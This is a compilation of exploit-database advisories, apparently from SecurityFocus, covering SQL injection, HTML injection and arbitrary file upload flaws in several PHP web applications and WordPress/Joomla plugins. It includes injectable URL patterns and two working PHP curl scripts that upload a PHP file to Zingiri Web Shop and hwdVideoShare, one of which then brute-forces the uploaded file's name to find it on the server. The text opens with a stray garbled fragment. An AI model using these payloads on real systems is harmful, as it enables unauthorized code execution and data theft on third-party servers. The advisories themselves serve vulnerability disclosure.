Vulnerable" pwned_edi()
-
source: https://www.securityfocus.com/bid/54023/info ADICO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ADICO 1.1 is vulnerable; other versions may also be affected. http://www.example.com/car-rent/[PATH]/admin/index.php?job=cars&action=edit&id=[SQL INJECTION] http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION]
-
source: https://www.securityfocus.com/bid/54020/info Zingiri Web Shop plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Zingiri Web Shop 2.4.3 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/&action=save"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('fh'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
-
source: https://www.securityfocus.com/bid/54024/info Simple Forum PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Simple Forum PHP 2.1 is vulnerable; other versions may also be affected. http://www.example.com/cms/forum.php?p=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum.php?orderType=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum.php?orderType=[ASC/DESC]&orderBy=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum/admin.php?act=topics&orderType=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum/admin.php?act=topics&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=-1 [SQL-INJECTION]-- http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]--
-
source: https://www.securityfocus.com/bid/54026/info NetArt Media Jobs Portal is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible. NetArt Media Jobs Portal 3.0 is vulnerable; other versions may also be affected. http://www.example.com/EMPLOYERS/index.php?category=application_management&folder=my&page=details&posting_id=113&apply_id=68+order+%20by+1--%20[SQL INJECTION]--
-
source: https://www.securityfocus.com/bid/54037/info The hwdVideoShare component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. hwdVideoShare r805 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php.vob"; $ch = curl_init("http://www.example.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; echo "<br />"; $i = 0; for ($i=1;$i<9999;$i++) { $n = 4; $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT); $filename = date('YmdH').$num.$uploadfile; $url = "http://www.exemple.com/tmp/".$filename; $c = curl_init("$url"); $postResult2 = curl_exec($c); $info = curl_getinfo($c); $httpcode = $info['http_code']; if($httpcode == 200){ echo $url; curl_close($c); exit; } } ?>